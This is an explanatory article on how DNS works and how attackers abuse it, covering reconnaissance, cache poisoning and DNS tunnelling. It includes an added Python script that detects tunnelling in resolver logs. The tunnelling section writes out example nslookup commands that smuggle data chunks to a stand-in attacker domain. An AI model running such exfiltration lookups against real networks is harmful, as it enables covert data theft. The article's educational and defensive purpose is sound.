The Domain Name System (DNS) is a fundamental component of the modern network that translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to communicate with each other. DNS predates the World Wide Web and facilitates virtually all communications on the Internet, as well as other uses that could not even be imagined when it was developed in the early 80s. However, the lack of security features in this long-lived network protocol has led to numerous vulnerabilities and attacks. In this article, we will answer questions like "What is DNS?", "How does DNS work?" and "What are the different types of DNS records?"
What is DNS?
DNS is often referred to as the Internet version of the Yellow Pages. In the old days, when you needed to find a business address, you looked for it in the Yellow Pages. DNS is just like that, except you don't actually have to search for anything - your internet-connected computer does it for you. This is how your computer knows how to find Google, ESPN.com or Managedserver.it.
For two computers to communicate over an IP network, the protocol dictates that they need an IP address. Think of an IP address as a street address: for one computer to "locate" another, it needs to know the other computer's number. Since most people are better at remembering names - www.google.it - than numbers - 184.108.40.206 - a program was needed to translate the names into IP addresses.
DNS is most often thought of in the context of the World Wide Web, but in truth there is a DNS lookup behind almost every type of network request, even those not initiated by a user. Software updates, social media apps, and even malware generally reach a host name rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.
How DNS works
DNS is such an integral part of the internet that it's important to understand how it works.
Think of DNS as an address book, but instead of mapping people's names to their addresses, the address book maps computer names to IP addresses. Each mapping is called a "DNS record". DNS clients on connected devices contact DNS servers to retrieve these records. Different types of records are used for different purposes. Web browsers rely on a type "A" record, while the "MX" record points to a mail server. This is how you can host a website with one service provider and your email with another.
Here is a look at the "A" record for varonis.com as seen by a popular command line utility called DiG:
As you can see in the example, it is possible to have multiple records for a single host name or domain. This can be used to provide redundancy and load balancing.
The internet has a lot of computers, so there's no point in putting all these records into one big book. Instead, the DNS is organized into smaller books or domains. Domains can be very large, so they are further organized into smaller books, called "zones". No single DNS server stores all the books - that would be impractical.
Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it may ask the DNS server on your local router. The local router will in turn make an “upstream” query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can go “upstream” until they reach the authority of the domain or “authoritative name server”. In practice, the results are often "cached" at lower levels to avoid having to run the entire process for each query.
An authoritative name server is where administrators manage the server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change, or delete a server name or IP address, they make a change to their authoritative DNS server (sometimes called the “primary DNS server”). There are also “slave” DNS servers; these DNS servers keep copies of the DNS records for their zones and domains.
DNS queries, servers and record types
The basic concepts behind DNS are relatively simple, but over the years the technical side of things has become increasingly complex. Here is a look at some of the internal mechanics of the system:
What are the types of DNS queries?
A DNS query is the message sent by a client to a DNS server or between two DNS servers. A DNS query can be one of the following:
- Recursive DNS query
In a recursive DNS query, a DNS client will reach a server, which in turn will make upstream requests for the domain in question until a result is found. The only rule set for a recursive query is that a result must be returned, if there is one. There can be one or dozens of recursions. The initial server or even the local DNS client might have a cached result already. A time-to-live (TTL) value determines how long one of these results can be cached; once the TTL is reached, the client or server will have to look up the results upstream.
- Iterative DNS query
Unlike recursive DNS queries, iterative DNS queries do not travel upstream. Instead, the DNS server the client is addressing will do its best to answer the query from what it already knows. If it can't, it may refer the client to a different DNS server, such as an authoritative name server or a TLD name server. The requester continues this iterative process until it finds an answer or the query times out.
What are the types of DNS servers?
As already stated, DNS is a distributed system, which means that servers around the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:
- Recursive DNS
Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, responds if a hit is available in its cache, or queries a name server higher in the chain. Recursive resolution is usually handled by ISPs, but it's easy to change a computer's DNS configuration to point to another resolver for performance, security, or privacy reasons.
- DNS Root Server
As the name suggests, root servers are the foundation on which the entire DNS infrastructure is built. Root servers act as authoritative name servers for top level domains (TLDs) such as ".com" and ".net". There is a problem, however, because the root servers themselves are referred to by host names within those same TLDs. If a DNS client can't determine which name server to turn to for ".net", how can it possibly resolve a fully qualified domain like "a.root-servers.net"? The answer is that DNS clients and lower level servers are "bootstrapped" with a list of thirteen root server IP addresses. These addresses don't tend to change often, and only one of them needs to be reachable to discover the others.
- TLD name server
TLD name servers are second in importance only to root servers, as they know where to go to get answers on any domain within a given TLD. When looking for www.managedserver.it, the TLD server for ".it" responds first, pointing the client at the name server that holds the records for the "managedserver" part of the domain name.
- Authoritative Nameserver
The authoritative name server is the last stop for a DNS query. This server (or, often, several servers for redundancy) is the highest authority for a given domain. However, not all DNS queries reach the authoritative name server, as there may be cached results closer to the initial request.
Organizations often use DNS internally as well. The operation is not much different, except that DNS lookups and records remain within the corporate network rather than the Internet. This is known as "private" or "local" DNS as opposed to the public DNS service.
What are the types of DNS records?
DNS records come in a wide variety of types, each used for different purposes. Here are some of the most common:
- "A" record - the classic use of DNS; translates a domain into an IPv4 address.
- "AAAA" record - same functionality as an "A" record, but with an IPv6 address instead of IPv4.
- "MX" record - short for "Mail Exchange"; identifies the e-mail server associated with the domain.
- "TXT" record - used for a wide variety of purposes, from proof of domain ownership to cryptographic email signing to fight spam.
Advantages and weaknesses of DNS
There are many good reasons why we are still using DNS after all these years. Some of the advantages of the system include:
- It is distributed and resilient
There weren't many domains in use during the early days of the internet, so it's conceivable that we could have ended up with a single central database with all domain-to-IP mappings. This, of course, would not have allowed the scalability needed to power the modern Internet. The distributed nature of DNS also means that the system is resilient; a power outage, a cut fiber cable, or a cyber attack on a DNS server will not interrupt the system as a whole.
- It is versatile and extensible
DNS developers have always wanted the protocol to be extensible as technology progressed. Extensions to the original DNS standard brought new features and functionality while maintaining backward compatibility. Over the years, new record types, improved rules for DNS packet delivery, and improved security have been added.
- It is an open and well documented standard
DNS was not born out of a particular provider's dominance or a desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. There are many different DNS client and server implementations, but because they conform to a common standard, they can all work together.
Weaknesses and Vulnerabilities
The first iterations of the Domain Name System (DNS) date back to the early 80s, well before the emergence of modern cybersecurity threats. As a result, DNS and many other older protocols still in use today, such as ARP and ICMP, never included much in the way of security features. In the years since, a number of extensions and mitigations have been devised as new threats have emerged, but DNS is still often abused by attackers.
From a threat actor's point of view, there are several characteristics that make DNS attractive:
- Every network uses it
DNS is ubiquitous. Almost every computer network in the world sees thousands or millions of DNS queries every single day. While not technically necessary for an IP network to work, blocking or throttling DNS simply isn't practical, so nearly every firewall on the planet is configured to allow outbound traffic on port 53. This means attackers not only have an almost guaranteed way out of a compromised network, but also a lot of legitimate traffic to blend in with.
- There is no authentication
Like many other early network protocols, DNS never included an authentication mechanism. This means that in the core DNS protocol it is not possible to be sure that a given result is authentic. Attackers have taken advantage of this with a whole range of spoofing and poisoning attacks that target everything from individual machines to vast swathes of the entire internet.
The lack of DNS authentication became headline news in 2008 when security researcher Dan Kaminsky discovered a huge vulnerability that could have allowed attackers to poison the cache of almost any DNS server in use at the time. The result was that even with very little technical skill, an attacker could trick legitimate DNS servers into sending bogus IP information for important domains like a bank or government institution.
Faced with the threat of bogus DNS records wreaking havoc in the internet community, service providers and standardization bodies have teamed up to adopt something called Domain Name System Security Extensions (DNSSEC). DNSSEC uses public key cryptography to digitally sign DNS results, ensuring that the response to a query is truly authentic.
- There is no encryption either
DNS queries and their responses are sent in the clear, which means anyone on the network can view them with a tool like Wireshark. This presents potential privacy concerns because it means your co-workers, your boss, or even your ISP can tell which domains you interacted with. This is also true for websites that use SSL/TLS encryption: the actual data transferred between the site and your computer may not be viewable, but the initial DNS query that gave you the site's IP address in the first place is.
Two concurrent approaches have been advanced to wrap DNS traffic in a layer of encryption as it passes through a network: DNS over HTTPS (DoH) and DNS over TLS. Which approach to use - and whether DNS should be encrypted in the first place - is the subject of heated debate.
Types of DNS attacks
DNS reconnaissance attacks
DNS is all about information, which from an attacker's perspective can be a valuable tool. DNS queries can be used to map a victim's network infrastructure by revealing live hosts on a network, discovering the hostnames of high-value targets such as mail and file servers, and providing clues to the applications and services in use. You can perform your own local DNS recon mission simply by following the instructions below:
If you have a Windows computer, run the following commands as they are; if you are a Linux user, there are corresponding commands you can search for.
- Open a command prompt (type Ctrl + esc, the letters “cmd”, then enter).
- Type `ipconfig`.
- You'll see the DNS domain you're in (connection-specific DNS suffix), your IP address, and a bunch of other things. You will want to refer to this.
- Type `nslookup [IP address]`. You will see the name of the DNS server that is responding and, if the name is known, the DNS record listing the name and IP address.
- `nslookup -type=soa [your domain]` returns your authoritative DNS server; wouldn't that be useful if you were trying to infiltrate a network?
- `nslookup -type=MX [your domain]` returns all mail servers on your local domain, in case you want to hack mail servers and don't know where they are.
As we have already learned, most networks have a lot of DNS queries going on all the time. For many standard security products and network monitoring solutions, the queries used by an attacker to enumerate a network do not look much different than all other legitimate queries.
DNS hijacking to redirect traffic
The lack of authentication in the original DNS protocol gives attackers a huge advantage because it means that queries and responses can be manipulated or spoofed in many different places from the local machine to the global DNS resolvers.
A classic local network attack involves chaining ARP spoofing with an unauthorized DNS server. If successful, this causes other machines on the network to funnel their DNS queries to a server controlled by the attacker. The attacker can then return their own IP addresses for those queries instead of the legitimate address. Without mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that they were actually communicating with a malicious fake.
Attackers can also use a variety of techniques to poison the cache of legitimate DNS servers. This typically occurs when organizations run their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have a global impact, so these providers tend to be very security conscious. However, even the big providers are not immune to vulnerabilities.
If an attacker successfully spoofs a DNS response, they can cause the receiving DNS server to cache a poisoned record. So how does that help the attacker?
Here's an example: let's say an attacker learns that your organization uses an external application for something important, like expense management. If they poison your organization's DNS server so that it sends every user to the attacker's server, all they have to do is create a legitimate-looking login page and the users will enter their credentials. They could even forward the traffic to the real server (acting as a "man in the middle"), so no one notices. The attacker can then try those credentials on other systems, sell them, or just celebrate with a wicked laugh.
Using DNS as a covert channel
Since outgoing DNS traffic is hardly ever blocked, and there tends to be a lot of it, using DNS for data exfiltration or covert communications has become a favorite tactic of many sophisticated adversaries. The attackers' goal is to blend in with all that legitimate network traffic through a technique called DNS tunneling. In some cases, an attacker will simply misuse the DNS protocol to carry data in ways it was never intended for. This can be risky, however, as it may generate large spikes or unusual traffic patterns that a well-prepared organization can quickly notice.
A more sophisticated approach involves misusing the DNS infrastructure itself. The attacker sets up a DNS domain (evil-domain.com, for example) on the Internet and creates an authoritative name server for it. Then, on the compromised host, the attacker runs a program that splits the data into small chunks and inserts them into a series of lookups, like so:
- nslookup My1secret1.evil-domain.com
- nslookup is1that1I1know.evil-domain.com
- nslookup how2steal1data.evil-domain.com
Your organization's DNS server (corp.com in this example) receives these requests, finds that the results are not in its cache, and relays them to the authoritative name server of evil-domain.com. The attacker expects this traffic and runs a program on the authoritative name server that extracts the first part of each query (everything before evil-domain.com) and reassembles the data. Unless your organization is inspecting the queries made by its DNS servers, it may never realize that they were used to exfiltrate data.
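The tunneling pattern above (many distinct, long or random-looking subdomains under one registered domain) is what a defender can look for in resolver query logs, which addresses the earlier point that such queries are hard to tell apart from legitimate ones. The following is an added example, not code from the article or from any product it mentions; the log format, the sample lines (including the three evil-domain.com lookups) and the thresholds are constructed assumptions.

```python
import math
from collections import defaultdict

# Constructed sample of resolver query-log lines (not from the article); assumed
# format "<time> <client-ip> <qtype> <qname>", one query per line.
SAMPLE_LOG = """\
10:00:01 10.0.0.12 A www.managedserver.it
10:00:02 10.0.0.12 MX managedserver.it
10:00:03 10.0.0.15 A My1secret1.evil-domain.com
10:00:03 10.0.0.15 A is1that1I1know.evil-domain.com
10:00:04 10.0.0.15 A how2steal1data.evil-domain.com
10:00:05 10.0.0.15 A 4a7f9c2e1b0d3f6a8c5e7b9d1f3a5c7e.evil-domain.com
10:00:06 10.0.0.15 TXT 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.evil-domain.com
10:00:07 10.0.0.20 A cdn.example.net
"""

def shannon_entropy(text: str) -> float:
    """Bits per character: encoded chunks score high, ordinary hostnames low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname: str):
    """(subdomain prefix, registered domain). Assumption: the last two labels are
    the registered domain; real deployments should use the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def analyze(log_text, min_unique=3, max_len=30, min_entropy=3.5):
    """Aggregate queries per registered domain and flag the tunnelling pattern:
    many distinct prefixes that are unusually long or high-entropy."""
    stats = defaultdict(lambda: {"prefixes": set(), "max_len": 0, "max_entropy": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the analysis
        prefix, domain = split_qname(parts[3])
        if not prefix:  # a bare-domain query (e.g. the MX lookup) carries no payload
            continue
        s = stats[domain]
        s["prefixes"].add(prefix)
        s["max_len"] = max(s["max_len"], len(prefix))
        s["max_entropy"] = max(s["max_entropy"], shannon_entropy(prefix))
    report = {}
    for domain, s in stats.items():
        suspicious = len(s["prefixes"]) >= min_unique and (
            s["max_len"] >= max_len or s["max_entropy"] >= min_entropy)
        report[domain] = {"unique_prefixes": len(s["prefixes"]), "max_len": s["max_len"],
                          "max_entropy": round(s["max_entropy"], 2), "suspicious": suspicious}
    return report
```

Running `analyze(SAMPLE_LOG)` flags evil-domain.com (five distinct prefixes, the longest 32 characters) and leaves managedserver.it and example.net alone; in production the thresholds should be tuned against a baseline of normal per-domain query volume, since CDNs and some anti-spam services legitimately generate many unique subdomains.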
And even more types of attacks!
The above list is by no means a complete list of all possible DNS attacks. The protocol has been abused for everything from DDoS campaigns to covert monitoring of Internet users. Attackers have recently been observed modifying the DNS configuration of various home routers to spread malware. Both malicious actors and security researchers are constantly on the lookout for new vulnerabilities, and their attention is unlikely to shift anytime soon.
DNS has been around for a long time, and every computer connected to the Internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Fortunately, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and prevented.